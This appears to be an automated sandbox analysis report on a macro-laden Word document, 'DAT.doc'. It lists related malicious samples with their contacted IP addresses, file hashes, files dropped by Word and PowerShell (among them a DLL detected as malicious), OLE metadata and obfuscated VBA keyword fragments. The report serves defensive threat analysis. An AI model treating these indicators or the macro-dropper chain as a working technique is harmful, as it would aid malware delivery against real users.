	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	159.89.91.92
TTNET-MYTIMEdotComBerhadMY	Doc.doc	Get hash	malicious	Browse	202.187.222.40
	Informacion_4-09757.doc	Get hash	malicious	Browse	202.187.222.40
	Info.doc	Get hash	malicious	Browse	202.187.222.40
	4693747_2020_7865319.doc	Get hash	malicious	Browse	202.187.222.40
	index.html.dll	Get hash	malicious	Browse	202.187.222.40
	Documento_2020.doc	Get hash	malicious	Browse	202.187.222.40
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	202.187.222.40
	MF11374 2020.doc	Get hash	malicious	Browse	202.187.222.40
	SecuriteInfo.com.W97M.DownLoader.5028.13042.doc	Get hash	malicious	Browse	202.187.222.40
	INFO-22.doc	Get hash	malicious	Browse	202.187.222.40
	Documento_9276701.doc	Get hash	malicious	Browse	202.187.222.40
	Dati_2112_122020.doc	Get hash	malicious	Browse	202.187.222.40
	Informacion 122020 N-98239.doc	Get hash	malicious	Browse	202.187.222.40
	as233456.doc	Get hash	malicious	Browse	202.187.222.40
	Y0124.doc	Get hash	malicious	Browse	202.187.222.40
	nIUMFDogK0.exe	Get hash	malicious	Browse	202.187.199.171
	Transfer invoice.vbs	Get hash	malicious	Browse	61.6.84.83
	REMITTANCE SLI.exe	Get hash	malicious	Browse	61.6.13.149
	a2.ex.exe	Get hash	malicious	Browse	202.184.167.189
	meront.exe	Get hash	malicious	Browse	61.6.30.223

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD45F3-025D-4403-9DBE-B492A11253DC}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EFB91ABE-05DA-472A-B36E-E117862B01B3}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbC:IiiiiiiiiifdLloZQc8++lsJe1MzCI/
MD5:	046714685D54E39663BFFF13AABE42AF
SHA1:	22BFFE5DBD5460D954ED62EADF55B86F6F15CD1B
SHA-256:	98A19DFE5BF35608A2629B9BA7E6AC3E8B27C4C34B4FEB9F8916FDACB84B4F6E
SHA-512:	6B76E6B30738E27B7903A361AFDDA4368D00A1CE5D189463C15AF034322845CFED1C25F18904D6A8E749CFAF7D8671317CD2A81CCA206EB8254ABD4D213D357C
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.25446548470375
Encrypted:	false
SSDEEP:	1536:C6Rv3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CAdNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	398F7CDDC8E08A25BBE33EAE236619CD
SHA1:	C87ECEC396D70A05EA7C45A203994874BFA7BB73
SHA-256:	4894BA0CE30D95F643D5094498300D002A1DAE075545982F76BF8FCA5C591DB2
SHA-512:	DA802A6F3640E17D43504BABBE23710D6DB562405C3BDBB8D506AA820AA449712827160866736614D176C698A4F48B47875DC3A9CEAD0F531718FB094228069E
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DAT.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Tue Jan 26 20:47:41 2021, length=217600, window=hide
Category:	dropped
Size (bytes):	1946
Entropy (8bit):	4.501314648178266
Encrypted:	false
SSDEEP:	24:88D/XTm6GreVyE2jeDSDv3qmidM7dD28D/XTm6GreVyE2jeDSDv3qmidM7dV:8c/XTFGqMKRQh2c/XTFGqMKRQ/
MD5:	73F1F369EF0B792BFEC29ABE55E63B52
SHA1:	744555DA903DC01290713CBD52A467A5AAC10771
SHA-256:	26E8BAD56AEF128550BDECAE7668FC826AF0DF07CC9979AE15F935AB08CD184D
SHA-512:	232C43AD6D31BE3B30F1349DAAC3BE4B6D7FC8BA5B58A36863179BD1AEF27BF4B33041A60D0A7354DA33597D5D2765D686346AF8F49BDA6848A3E6D69174299B
Malicious:	false
Preview:	L..................F.... ...~/...{..~/...{..5...,....R...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2..R..:R.. .DAT.doc.<.......Q.y.Q.y...8.....................D.A.T...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\610930\Users.user\Desktop\DAT.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.A.T...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......610930..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F.... ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	3.9372852672447682
Encrypted:	false
SSDEEP:	3:M1yxLFXC5UXCmX1yxLFXCv:MwNGvN2
MD5:	26269B76605D99EE3B367DCC3644AA0C
SHA1:	A15EA89E09646F9044B44F6B3CAA1789C2D15ADF
SHA-256:	6511114584177216108550D28F472A9A67A6199EB28DA182995787A3E41420F0
SHA-512:	755CEBDA59A53FB694279634FC96EE6861028CB0280220B98C9C1AFBF2F455C54977D35196575A90CD747B51035526F9E648EABD42189A1C389630EF09CAFD60
Malicious:	false
Preview:	[doc]..DAT.LNK=0..DAT.LNK=0..[doc]..DAT.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LUH2B8VGADR0W1ZLPOHV.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5881410910957503
Encrypted:	false
SSDEEP:	96:chQCsMq+qvsqvJCwoTz8hQCsMq+qvsEHyqvJCworxz2YYbHof8HXlUVNIu:cyDoTz8yXHnorxz2wf8HOIu
MD5:	87912A51973EC64DDA95BF055807AAE5
SHA1:	8C4E99EFE1E17123DBE25D05F8C20D4D57FEB00D
SHA-256:	49DBD1B13A2E3552CA326D5CFE2C7E700D98BFD6A8827D08ED2A5BBF6875BFEC
SHA-512:	7F7ADB8EAC3A9DB8BF50262AA08137198ACFEC4487554BB66E1E2076C0FBEC1B004C2542DB840374088BF10842904A7AED75BC66D01BFA2CB1921EFE2A07C823
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$DAT.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282112
Entropy (8bit):	7.319297637083266
Encrypted:	false
SSDEEP:	6144:jKSVU4aYs3mEnHWWK35gV5cC5B4HIfPj:jKP4aYynHjK35gV5cy4wj
MD5:	3B0A191F70968B2B033B99A8668E7445
SHA1:	E51E0DBA230E63ED4DD53C9FCB66A84ACD3F32A2
SHA-256:	D9942043944E5D28D9EAED4988C45020187B4A88F10B67B7C32F27592B8929B1
SHA-512:	30EEC024564A8CBD53F3DE9B6F2996ED53CD95574CC2DE0BB117A743F668AEC5771B7715CC7174C81E2277F11C239C19C91E9F7E34F368E54A60FDCA8881A2F8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 59%, Browse Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{.(.(.(l.A(.(..Y(.(..g(...(..f(L..(/_M(...(.(...(..g(.(..Z(.(..](.(..(.(..X(.(Rich.(........PE..L...x/._...........!................x...............................................................................pN..R....N..<....... .......................x....................................8..@...............H............................text...{........................... ..`.rdata..............................@..@.data....<...`.......>..............@....rsrc... ............Z..............@..@.reloc..x............2..............@..B................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Investment Account Garden, Books & Automotive Sleek Planner Ergonomic Cotton Bacon Agent Profound Wooden Enhanced Tasty Gorgeous Soft Shirt end-to-end Estate Russian Ruble, Author: Louise Berger, Template: Normal.dotm, Last Saved By: Clment Leclercq, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 22 06:15:00 2020, Last Saved Time/Date: Tue Dec 22 06:15:00 2020, Number of Pages: 1, Number of Words: 5823, Number of Characters: 33197, Security: 8
Entropy (8bit):	6.392374758884552
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	DAT.doc
File size:	217574
MD5:	6792d7fd9d2f9237cd31d1234edcec03
SHA1:	af8329cc3d379f678aac5f2a1b83a7697dd190af
SHA256:	55f177ec4613b1b03a37199e3c7d49336dd424a66737f79005208aa9883b192b
SHA512:	b3c7ad749193c731e7d9be5e392609abe3e1b67fb4ec6a061bb975d33b15358f62d5bf91aa6c5c0c74333f54642283a4bc2c3dca401fbb2f486fd9c38da0951d
SSDEEP:	3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gRyDJbwRe/dNx0tZC15rJDMsIxy:O9ufsfgIf0pLkbwQlNx0t415rJDMsIxy
File Content Preview:	........................>.......................9...........<...............6...7...8...}......................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "DAT.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Investment Account Garden, Books & Automotive Sleek Planner Ergonomic Cotton Bacon Agent Profound Wooden Enhanced Tasty Gorgeous Soft Shirt end-to-end Estate Russian Ruble
Author:	Louise Berger
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Clment Leclercq
Revion Number:	1
Total Edit Time:	0
Create Time:	2020-12-22 06:15:00
Last Saved Time:	2020-12-22 06:15:00
Number of Pages:	1
Number of Words:	5823
Number of Characters:	33197
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	1252
Number of Lines:	276
Number of Paragraphs:	77
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: UserForm1, Stream Size: -1

General
Stream Path:	Macros/UserForm1
VBA File Name:	UserForm1
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{52A43B34-A9C8-4F96-A958-A43ACC1599CB}{AFB796FE-6EB6-46FD-8BFC-3D728DC178CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	Macros/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Base
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{2D23F958-D2D9-4832-928D-FB33041E5587}{825B89C9-94E3-46E3-BC0F-A2DC216A1D77}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm3, Stream Size: -1

General
Stream Path:	Macros/UserForm3
VBA File Name:	UserForm3
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_Base
VB_Customizable
VB_TemplateDerived
VB_Exposed
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{1F3E43FD-F8BE-4426-9384-C6A88D75F1C9}{D40BF70E-BE28-4285-9F4F-3488ADA6BC4B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm4, Stream Size: -1

General
Stream Path:	Macros/UserForm4
VBA File Name:	UserForm4
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
VB_Creatable
False
VB_Exposed
Attribute
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{6EB2EE04-13A3-4362-BA3F-59875CB1EF58}{9BBDA8EB-AD12-4F4D-93E8-0EF91D5DFAF4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm5, Stream Size: -1

General
Stream Path:	Macros/UserForm5
VBA File Name:	UserForm5
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Base
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{F87A6A7A-77E7-4161-9232-75F50A9CDC8F}{EE80D04B-EC7B-4C25-B93D-02A7611C2194}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: Dwztpwkmgv8q9o28r, Stream Size: 27677

General
Stream Path:	Macros/VBA/Dwztpwkmgv8q9o28r
VBA File Name:	Dwztpwkmgv8q9o28r
Stream Size:	27677
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . Q w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 8c 08 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 93 08 00 00 03 4a 00 00 00 00 00 00 01 00 00 00 1b cf 51 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
kvkwNE
"gbBrhF.kCOlJnAJ.GLIdD"
"QlyBbpIG.CHPUEZ.BAQVDHmJ"
'OPurH
"WanlBnGn.vOkxHB.FUNtGuCCw"
vmlpJOA:
"aKrxWJUr.NfKHtA.lWiIG"
FymJHI
uhqsGuAB
VBA.Replace
'hnOfJN
'LyQczqYvJ
QdQmIDzTC
"PVgOlGBl.pUbOHFCY.MgaMJSI"
"DySslFhhA.wiGJV.ChxbEmyAk"
"QsQGaIC.AwxeAW.xtrtFCFdF"
"lEilB.QvPXD.cMfWCJO"
"klmCEx.LHwvHEV.nvbNG"
UaqRCIH
wdKeyS
"dfOYHJLF.uBXVkGE.ghpJGB"
"asHdBA.RNUGfJo.UEIiMmoM"
hTTQEJEAC
WWCACxG
"ZDHjAEWl.doArj.lPBxKCC"
TrdMzBDZJ:
pRdXtubFT
"yzpwxsD.ucWxvGt.QXFsbDn"
QSISC
AsvyFHHC:
CUZigB
aektCnFI
"IJzlC.SoCtG.TPbXhBKrm"
"FbjEBIGb.HVqybIN.uhHkRpG"
"qq)(s"
"BCyTAdFeI.MvwOCAI.YKhJFAApg"
xuHzWGDG
"nbYwYEWhC.CeOFDlC.VvhoEHt"
Binary
"NxgIP.TARFAADew.NyFRA"
"JvOnPcH.fUHBCGVtD.MqiHAD"
ClyWRG
"dVMtDJ.ecCLuZ.vNWxUB"
"ThIgAFZBB.NbVEqpw.YsHvp"
QGPRjInP
"jevGKBz.ZpfmEFvDM.fkIcAGBII"
"sClXGS.DwVOXN.VhyWJEJ"
'POyDeJ
"PBmiWVMA.fEuTBGH.ZgHREKHJC"
huGtwmS:
rFHJy
"CRkMC.mCwoR.dFnkA"
"ywqUjrAcG.nStXYBIsJ.CUmPFEHE"
"bpgkEyAEz.XZZWFRiW.DWsAgQ"
kPMjtUB:
"GAzJGdUeC.SjRAxF.SebwGKPCv"
SyZjrEHAG
"fnehJF.MwLyDGIC.meixAlF"
"wXXiJHf.TCBShGYr.DNKsHT"
DqWYFGG
"sLYJBI.TQZluJA.LgcFP"
"nrzOZDa.ZzIiFFSE.VjWVF"
AEazvYO
'DYLTWEF
"HKwtB.rBrtHJf.lLgDD"
"uIxkJo.MWxKvDHC.vvgQEXJDH"
UxlgEAI
'UDjSMF
mJsZBCEFo
LbhGD
cztpFp
"sNdvIH.EwGNvsEC.ALrzVIC"
"xINyH.PTxmCYVEI.ZjICHD"
'gmzmA
nmTHypHA
'DVUNjGqL
aeMpCH
QdQmIDzTC:
vuEJPy
'WteBl
PYuemWAC:
'mYWbL
PJjuJ
fIjVkJj:
JZcLuFA
rKyfgFyfq:
"nXywAI.gJpfbBO.HipQCDYJJ"
"rxhFoG.AShLFJDl.zybsiV"
"fSJtFAEEA.yqTyACLA.PWwsTDwIy"
"YHUtVQCI.AyvDaAH.JsZULCUu"
"TXrkTGK.FbNkBCE.nGfkHCJj"
wWUQDA:
GWbqA
"dOeICmG.rNLBfGjIw.auFLHQY"
"iVnKJ.YEevQ.GWucCAFI"
"QQMFr.jWYtE.SdCsJ"
"aGQoDDk.VZsZQhDoP.fnRuG"
nmWOSYyF:
TfsIR
aeMpCH:
'yoOwJD
"kfSFYoEHi.aXUIAvAP.dswKhikA"
"cDYsKH.cikTAY.Ezyuc"
"nmuAl.yeRQHDs.UqyoFI"
BOzmWI:
RBFRbHBg:
'FWRUNdgHJ
BHZQG
"rRdnUjHbw.iDplGAz.PjQxp"
qTLRXCv
yPqfxADJ:
Resume
sFyhnDDx:
OybSq
BOzmWI
'HZaLGI
"ENMCE.LcqmMLm.kcwYHCV"
"gaJjDP.jqoPjEzCA.sqvbMGBp"
"mQnnE.bmZQGSEA.AGkxGzCHX"
"AlRZo.MXGVMDVDJ.FRGRQ"
vIDVA:
jUDsXM
WKiiJDVJq
'WkgKBIH
"AscqIIYrJ.JeGiiSE.mYjmAABJ"
"gMgqJJ.sEwvhb.SuXWmVIA"
SFgGtIlpD:
"MOIhAmCn.UAJXCE.BwsiJS"
kvkwNE:
qpTUMG
lutoTsPkH:
huGtwmS
mdgvjEeAC
iKyOGBLAy:
"umMOXxmA.SfYuGDN.ueONFAEFD"
"TifoEDtFB.fukVJAvIS.dlciFGDA"
'fQYhA
"tPaIGWt.sNypwJ.uiODJJJA"
"eXoWdB.HSupDA.oXRxAS"
'rMAWIEja
nmwGcQ
"SZqPCAC.pZyeTtAF.ORiEHGH"
'DfsDD
oheeCHI:
PCRIYp
jaJUkAFeG
"ojxyHHEP.vXfQD.OBTMB"
"kwgqDdCZ.UJhzPcBmS.DIZSAkBG"
QGPRjInP:
"AQlXBCb.vtUJfcFG.uXigEO"
"shyujG.RFwdH.VPRoIX"
"VWYJvN.lGHiEC.AlsbD"
"eIQhLAGS.forvJhMB.LGyFI"
"lHZGGIbGc.iaJoCAFB.VNeICCIax"
"ZRfmBGEw.yZYjFMHP.ckDWe"
'FVzXiA
"cURDDF.pLPgGlcD.FYnPCELJI"
'cwxgFSS
UjcXr
nelsfX
NmmcJMB
"fzpZGsD.rsWZI.nhqNVH"
"GjkaJIH.peZmtHtGM.gypgP"
SLJdkBII
"eAdUlJHj.rMYTRAF.IMwLCCCT"
'kEafA
"uMBDk.VxvrDae.NYTTAIAe"
"KrSuJCFF.aeIBC.hRLXIc"
IkDkKCv
CJeaFB
xFoIFC:
"AhHYjIBs.vNObEAAJ.IRARxrx"
eRlMmLKx
'OEDeu
'BQaqZjA
"LwmxHCmp.NFrlTBA.VFGtT"
"ofEFEBH.KSyFFWK.TKfABI"
'NskblDD
zqgnJAxpy
"YeeTCIHp.dBrFLg.qZpkDJ"
uXAHJydE
'jtrvFEWLD
'zMMkH
xjadBeU:
"qSgyRp.VhQHDEA.ggPyFQd"
"jrtAEKE.uIVzu.jqMwAC"
DvDefEl:
jFUMUmIIJ
iVJGnsW
RBLslko
eVbTfoFi
'HLdYiFJHC
loQNDFH:
"MTfEVUDIQ.DlrvrPEB.PgggwwMD"
"MBUUAw.NbPECAix.UyuHH"
"xaihM.LJwjAQQQZ.DJoqHIrg"
XonQB:
"exIqDH.MwmVE.YEfbFIJ"
fIjVkJj
HpQEA
"myDIGCFHC.cgXWyuEFC.OybuGU"
mdgvjEeAC:
tWXiIJDnz:
"vPEJJqH.jFzYA.AlzwaDJBw"
"IyaYxC.BTSLmDJ.jgOiOIDGT"
nelsfX:
rJseFDK
'tdXnByPb
"BwDJADFsC.LJFNLbb.daiRJD"
'rpaKAI
"vBsfDkB.xlZBIMF.TDVEEFQJ"
"YBkxHBECF.YlsyXD.WgzGtH"
"UDZsNIDG.VfdgH.MBiBLq"
"stscCEAUT.PziCFDmD.xEGKXRGTE"
"nzFmWEVE.ZFvEGsIFD.mjIMGVD"
kPMjtUB
"wMlGriIC.YqLZwG.IfqJAT"
'UxHBcFQ
CUZigB:
AsvyFHHC
SFgGtIlpD
"UaWqrCaA.UYSnZCG.urBVH"
"RkYwxnJEW.rgdTkJfGF.zantCJ"
"qyXGFD.Mnoog.UnkFG"
GKsgQaAGE:
'ffPuICmH
mJsZBCEFo:
BHZQG:
"KuhBGApcv.ojBZUIIEX.HJefxELF"
"FVMJB.OanJEHHDG.BFKlGjECA"
"XcQyeAFEH.OxwUTAF.OjTNwA"
MURoCFiFB
SyZjrEHAG:
'VtNiGGmD
sFyhnDDx
qVbhwsATQ
zNPNECkYX
uXAHJydE:
RKPFYlFb:
wWUQDA
vmlpJOA
aektCnFI:
PViTAAED:
"QEkjG.mlBEHrAJ.IdkPDI"
'zHXJG
"DMNSECHJb.bbxJxAEDq.LnJxA"
"HvCbXDBq.RUZaGEzC.bgBsAAd"
'hAsNYHIgo
'wvoHE
"gFPXD.IEgaqJz.YAHsC"
"GmQlB.gLlkBCq.ohnmP"
"OrYPhm.tEuCH.YaWnFsI"
'THrtIBIAD
"TxVEJ.iXjAEimg.TDSdLDOA"
nmWOSYyF
"qq)("
YFLpuEi
'KClXGffED
PYuemWAC
"ShUECDIR.otrtDOGBA.OugaBFHlJ"
VB_Name
"gWUYvHr.ZTgQT.DNujcI"
bRMAl:
xFoIFC
"XqxxqFG.ulGKCnC.YQRUOJ"
"gyhfb.ipvwBrE.vVquOxU"
"SgKEFsHED.atIRE.nAXgHCyr"
